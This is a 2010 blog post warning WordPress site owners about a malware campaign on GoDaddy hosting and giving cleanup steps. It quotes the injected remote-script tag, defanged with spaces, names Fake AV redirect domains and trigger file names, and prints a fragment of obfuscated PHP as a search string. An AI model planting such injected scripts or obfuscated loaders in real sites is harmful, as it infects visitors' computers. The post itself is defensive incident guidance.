On December 22, 2010, we received several reports that a new malware attack (acrossuniverseitbenet) has infected WordPress sites hosted at GoDaddy and possibly other hosting providers.
The malware script injected is as follows:
(I have put spaces in the url below for your protection so you can't click to open the url.)
<script src=”http:// acrossuniverseitbenet .com/js.php?kk=10″ > </script>
The worst part about this virus is it's much harder to clean. The malicious hackers have stepped it up a notch and decided to infect the WordPress database and not just server files. The above script is injected inside every single page and posts inside the database (wp_posts table).
This malicious script redirects website visitors to various sites hosting “Fake AV” websites and some are zero-day attacks. A zero-day attack means that anti-virus programs may not yet have their definitions updated and your computer can become infected even with up-to-date software.
Some of the Fake AV websites that the acrossuniverseitbenet redirects to are:
(I have put spaces in the urls so you can't click them for your protection.)
- ww23.smartsuite-4u .in
- ww3.top-s-can-foru .in
- www1.top-only-master .in
Here's a screen shot of one of the viruses caught by my AVG program:
Today, my computer was attacked three times and my AVG and MalwareBytes did not catch two of the viruses and I had to do a system restore to an earlier date.
I did not make a screen shot of the actual attacks, but it looked very similar to this:
As you can see by the above image, this can easily fool people into thinking they are looking at a folder on their Windows computer and not a web browser (look at the top where you can see the URL). It moves extremely fast and starts downloading tons of infectious files to your computer.
This Fake AV is very dangerous and can cripple your visitors computers. It is strongly advised that you put your website in maintenance mode immediately until it is fixed.
How to safely put your WordPress Blog in Maintenance Mode:
- Rename your root index.php file to something else (for example: index-hold.php).
- Upload a “Down for Maintenance” index.html page to your root directory.
- Rename your wp-config.php file to something else so no other pages connect to the infected database (for example: wp-config-hold.php).
- Clear your cache and cookies.
- Visit your website's home page to make sure you can see the “Down for Maintenance” page.
If you do not have a blank index page, please feel free to use mine. All you have to do is unzip it and upload it to your root directory where your wp-config.php file is.
Important: Make sure you rename it to index.html so that your server recognizes it for the home page.
Server Files Found:
There have been numerous “mystery” files found on infected websites that were uploaded on November 10, 2010. We believe these were trigger files that were set to “go off” today.
An example file name is sdfssdf_dfsdf.php
Be sure you look through your server files for these trigger files and remove them ASAP.
Contact Your Hosting Company
If you're hosted with GoDaddy, please fill out a support ticket with their security team here.
If you are hosting with another hosting provider, please contact them as well.
How many WordPress sites are infected with acrossuniverseitbenet?
At this time, the number of WordPress sites hacked or the number of hosting providers affected is unclear.
We have been working with GoDaddy directly to help resolve this issue and will keep you updated as we receive more information. Any updates will be put on this blog post, so be sure to check back often. If you need help, feel free to contact us.
We need your feedback!
If you're site been infected with this malware attack? If so, are you on GoDaddy or with another hosting provider? Have you found any other redirect scripts? Please let us know by leaving a comment below.
UPDATE: 12/22/2010 at 5pm CST:
Currently, we are unable to connect to any site affected on GoDaddy's server infected with this malware via FTP/SFTP. Getting a critical error – 550 Login authentication failed. Could not connect to the server. We had to change the FTP password to get in again. Not sure if it was a malicious hacker that changed it or GoDaddy for protection.
UPDATE 12/22/2010 at 8:27PM CST:
Just found another trigger file on a infected website. File name fritz_rather.php. Uploaded 11/13/2010 at 6:41am server time. This file must be time activate to go off today when it started redirecting site this morning.
You should search your server files for any files that have suspicious names and also do a search for the following to identify any malicious code:
<‘.'?php /**/ $_8b7b=”x63x72x65x61x74x65x5fx66x75x6ex63x74x6
The malicious code could have all or some of the above. They should be deleted immediately.
UPDATE 12/22/2010 at 9:39pm CST:
As you know we are working hard to fix as many websites as possible. Our good friends over at Sucuri have agreed to take on our overflow sites and get your sites fixed as soon as possible (generally within 4 hours).
You can get your hacked WordPress blog fixed here:
Open the above URL and scroll down the the “Have a single site with malware?” and click the “Sign Up” button. And be sure to check out their Sucuri Web Integrity Monitor services for your website. We use it and recommend it to all our customers.
Don't let your customers tell you your site's hacked, let Sucuri alert you instead.
*Denotes our affiliate link, see our Disclosure.
UPDATE 12/23/2010 2:50PM
GoDaddy has released a Security Update on their community blog regarding this malware attack. Read “Security Update: Malware Affecting Some Databases.”